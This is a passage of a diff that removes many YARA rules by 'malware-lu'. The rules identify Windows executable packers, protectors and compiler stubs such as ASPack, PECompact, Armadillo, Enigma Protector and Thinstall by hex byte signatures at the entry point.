C0 74 05 E8 E4 EB FF FF 33 C0 5A 59 59 64 89 10 68 D5 51 00 10 8D 45 EC E8 BB E5 FF FF C3 E9 A9 DF FF FF EB F0 5F 5E 5B E8 B7 E4 FF FF 00 00 00 FF FF FF FF 0A 00 00 00 63 5A 6C 56 30 55 6C 6B 70 4D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NTKrnlPackerAshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 10 00 00 50 10 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01LCCWin321xAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 64 A1 01 00 00 00 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 90 50 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NME11Publicbyredlime
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 30 35 14 13 E8 9A E6 FF FF 33 C0 55 68 6C 36 14 13 64 FF 30 64 89 20 B8 08 5C 14 13 BA 84 36 14 13 E8 7D E2 FF FF E8 C0 EA FF FF 8B 15 CC 45 14 13 A1 C8 45 14 13 E8 04 F8 FF FF 8B 15 D0 45 14 13 A1 C8 45 14 13 E8 F4 F7 FF FF 8B 15 CC 45 14 13 A1 C8 45 14 13 E8 2C F9 FF FF A3 F8 5A 14 13 8B 15 D0 45 14 13 A1 C8 45 14 13 E8 17 F9 FF FF A3 FC 5A 14 13 B8 04 5C 14 13 E8 20 FB FF FF 8B D8 85 DB 74 48 B8 00 5B 14 13 8B 15 C4 45 14 13 E8 1E E7 FF FF A1 04 5C 14 13 E8 A8 DA FF FF ?? ?? ?? ?? 5C 14 13 50 8B CE 8B D3 B8 00 5B 14 13 ?? ?? ?? ?? FF 8B C6 E8 DF FB FF FF 8B C6 E8 9C DA FF FF B8 00 5B 14 13 E8 72 E7 FF FF 33 C0 5A 59 59 64 89 10 68 73 36 14 13 C3 E9 0F DF FF FF EB F8 5E 5B E8 7E E0 FF FF 00 00 FF FF FF FF 0C 00 00 00 4E 4D 45 20 31 2E 31 20 53 74 75 62 }
-
-condition:
-		$a0
-}
-	
-	
-rule PEtitev13
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEtitev12
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv134v140b1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 00 80 ?? 40 90 90 01 85 9E 80 ?? 40 BB F8 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeMSVC70DLLMethod3emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 5E 5B 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEtitev14
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC }
-	$a1 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule SoftProtectSoftProtectbyru
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 60 E8 03 ?? ?? ?? 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 EB 01 83 9C EB 01 D5 EB 08 35 9D EB 01 89 EB 03 0B EB F7 E8 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 59 83 01 01 80 39 5C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02CDCopsIIAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 60 BD 90 90 90 90 8D 45 90 8D 5D 90 E8 00 00 00 00 8D 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPack118LZMA430ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A 00 00 FF 34 37 FF 74 37 04 FF D3 61 83 C7 ?? 83 3C 37 00 75 E6 83 BD 0D 0B 00 00 00 74 0E 83 BD 11 0B 00 00 00 74 05 E8 F6 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 AA 0A 00 00 89 85 1D 0B 00 00 5B 60 FF B5 F9 0A 00 00 56 FF B5 1D 0B 00 00 FF D3 61 8B B5 1D 0B 00 00 8B C6 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv108xAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02BorlandCDLLMethod2Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ARMProtector01bySMoKE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 01 00 8D 8D 92 31 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElock099cPrivateECLIPSEtE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 3F DF FF FF 00 00 00 ?? ?? ?? ?? 04 ?? ?? 00 00 00 00 00 00 00 00 00 24 ?? ?? 00 14 ?? ?? 00 0C ?? ?? 00 00 00 00 00 00 00 00 00 31 ?? ?? 00 1C ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3C ?? ?? 00 00 00 00 00 4F ?? ?? 00 00 00 00 00 3C ?? ?? 00 00 00 00 00 4F ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 75 73 65 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule XPack152164
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B EC FA 33 C0 8E D0 BC ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv123RC4build0807dllAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov253b3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 D8 ?? ?? ?? 68 14 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Imploderv104BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEiDBundlev100v101BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule JExeCompressor10byArashVeyskarami
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8D 2D D3 4A E5 14 0F BB F7 0F BA E5 73 0F AF D5 8D 0D 0C 9F E6 11 C0 F8 EF F6 DE 80 DC 5B F6 DA 0F A5 C1 0F C1 F1 1C F3 4A 81 E1 8C 1F 66 91 0F BE C6 11 EE 0F C0 E7 33 D9 64 F2 C0 DC 73 0F C0 D5 55 8B EC BA C0 1F 41 00 8B C2 B9 97 00 00 00 80 32 79 50 B8 02 00 00 00 50 03 14 24 58 58 51 2B C9 B9 01 00 00 00 83 EA 01 E2 FB 59 E2 E1 FF E0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Alloy4xPGWareLLC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 6A 04 68 00 10 00 00 68 00 02 00 00 6A 00 FF 95 A8 33 40 00 0B C0 0F 84 F6 01 00 00 89 85 2E 33 40 00 83 BD E8 32 40 00 01 74 0D 83 BD E4 32 40 00 01 74 2A 8B F8 EB 3E 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallV2403Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 }
-	$a1 = { 6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 57 BF 00 00 80 00 39 79 14 77 36 53 56 8B B1 29 04 00 00 8B 41 0C 8B 59 10 03 DB 8A 14 30 83 E2 01 0B D3 C1 E2 07 40 89 51 10 89 41 0C 0F B6 04 30 C1 61 14 08 D1 E8 09 41 10 39 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule FakeNinjav28AntiDebugSpirit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 64 A1 18 00 00 00 EB 02 C3 11 8B 40 30 EB 01 0F 0F B6 40 02 83 F8 01 74 FE EB 01 E8 90 C0 FF FF EB 03 BD F4 B5 64 A1 30 00 00 00 0F B6 40 02 74 01 BA 74 E0 50 00 64 A1 30 00 00 00 83 C0 68 8B 00 EB 00 83 F8 70 74 CF EB 02 EB FE 90 90 90 0F 31 33 C9 03 C8 0F 31 2B C1 3D FF 0F 00 00 73 EA E8 08 00 00 00 C1 3D FF 0F 00 00 74 AA EB 07 E8 8B 40 30 EB 08 EA 64 A1 18 00 00 00 EB F2 90 90 90 BA ?? ?? ?? ?? FF E2 64 11 40 00 FF 35 84 11 40 00 E8 40 11 00 00 6A 00 6A 00 FF 35 70 11 40 00 FF 35 84 11 40 00 E8 25 11 00 00 FF }
-
-condition:
-		$a0
-}
-	
-	
-rule ExeLockv100
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 8C C8 8E C0 BE ?? ?? 26 ?? ?? 34 ?? 26 ?? ?? 46 81 ?? ?? ?? 75 ?? 40 B3 ?? B3 ?? F3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEtitevxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EnigmaProtector10XSukhovVladimir
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 83 ?? ?? 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 C4 04 EB 02 ?? ?? 60 E8 24 00 00 00 00 00 ?? EB 02 ?? ?? 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 ?? ?? 89 C4 61 EB 2E ?? ?? ?? ?? ?? ?? ?? EB 01 ?? 31 C0 EB 01 ?? 64 FF 30 EB 01 ?? 64 89 20 EB 02 ?? ?? 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 ?? 58 61 EB 01 }
-
-condition:
-		$a0
-}
-	
-	
-rule ThinstallEmbedded27172719Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 C1 FE FF FF E9 97 FF FF FF CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv102bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }
-	$a1 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 C5 2B 85 7D 7C 43 ?? 89 85 89 7C 43 ?? 80 BD 74 7C 43 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PEProtect09byCristophGabler1998
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 45 2D 50 52 4F 54 45 43 54 20 30 2E 39 }
-
-condition:
-		$a0
-}
-	
-	
-rule VxPredator2448
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0E 1F BF ?? ?? B8 ?? ?? B9 ?? ?? 49 ?? ?? ?? ?? 2A C1 4F 4F ?? ?? F9 CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeMSVC60DLLemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 5F 5E 5B 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv16dVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 }
-	$a1 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule Enigmaprotector112VladimirSukhov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 FF 15 89 C4 61 EB 2E EA EB 2B 83 04 24 03 EB 01 00 31 C0 EB 01 85 64 FF 30 EB 01 83 64 89 20 EB 02 CD 20 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 90 58 61 EB 01 3E EB 04 ?? ?? ?? ?? B8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 01 E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 05 F6 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 B9 44 1A }
-
-condition:
-		$a0
-}
-	
-	
-rule hyingsPEArmorV076hying
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A ?? E8 A3 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule JDPackV200JDPack
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 ?? ?? ?? E8 01 00 00 00 ?? ?? ?? ?? ?? ?? 05 00 00 00 00 83 C4 0C 5D 60 E8 00 00 00 00 5D 8B D5 64 FF 35 00 00 00 00 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv01xv02xDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VcasmProtectorV1Xvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? 5B 56 50 72 6F 74 65 63 74 5D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule kkrunchy023alpha2Ryd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BD ?? ?? ?? ?? C7 45 00 ?? ?? ?? 00 B8 ?? ?? ?? 00 89 45 04 89 45 54 50 C7 45 10 ?? ?? ?? 00 FF 4D 0C FF 45 14 FF 45 58 C6 45 1C 08 B8 00 08 00 00 8D 7D 30 AB AB AB AB BB 00 00 D8 00 BF }
-	$a1 = { BD ?? ?? ?? ?? C7 45 00 ?? ?? ?? 00 B8 ?? ?? ?? 00 89 45 04 89 45 54 50 C7 45 10 ?? ?? ?? 00 FF 4D 0C FF 45 14 FF 45 58 C6 45 1C 08 B8 00 08 00 00 8D 7D 30 AB AB AB AB BB 00 00 D8 00 BF ?? ?? ?? 01 31 C9 41 8D 74 09 01 B8 CA 8E 2A 2E 99 F7 F6 01 C3 89 D8 C1 E8 15 AB FE C1 75 E8 BE }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PolyEnEV001LennartHedlund
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 6F 6C 79 45 6E 45 00 4D 65 73 73 61 67 65 42 6F 78 41 00 55 53 45 52 33 32 2E 64 6C 6C }
-
-condition:
-		$a0
-}
-	
-	
-rule Winkriptv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule TrainerCreationKitv5Trainer
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 40 68 25 45 40 00 E8 3C 02 00 00 50 6A 00 68 40 45 40 00 68 00 10 00 00 68 00 30 40 00 50 E8 54 02 00 00 58 50 E8 17 02 00 00 6A 00 E8 2E 02 00 00 A3 70 45 40 00 68 25 45 40 00 E8 2B 02 00 00 A3 30 45 40 }
-
-condition:
-		$a0
-}
-	
-	
-rule EXEStealthv272
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEStealthv273
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20 45 78 65 53 74 65 61 6C 74 68 00 EB 16 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 60 90 E8 00 00 00 00 5D 81 ED F0 27 40 00 B9 15 00 00 00 83 C1 05 EB 05 EB FE 83 C7 56 EB 00 83 E9 02 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02DEF10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 00 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 C1 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHpack01FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 68 54 ?? ?? ?? B8 48 ?? ?? ?? FF 10 68 B3 ?? ?? ?? 50 B8 44 ?? ?? ?? FF 10 68 00 ?? ?? ?? 6A 40 FF D0 89 05 CA ?? ?? ?? 89 C7 BE 00 10 ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEStealthv274
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 00 EB 17 53 68 61 72 65 77 61 72 65 20 2D 20 45 78 65 53 74 65 61 6C 74 68 00 60 90 E8 00 00 00 00 5D 81 ED C4 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 }
-
-condition:
-		$a0
-}
-	
-	
-rule ThinstallEmbedded22X2308Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 EF BE AD DE 50 6A 00 FF 15 ?? ?? ?? ?? E9 B9 FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PolyCryptorbySMTVersionv3v4
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? 28 50 6F 6C 79 53 63 72 79 70 74 20 ?? ?? ?? 20 62 79 20 53 4D 54 29 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ProtectSharewareV11eCompservCMS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 ?? 01 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 34 00 ?? 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
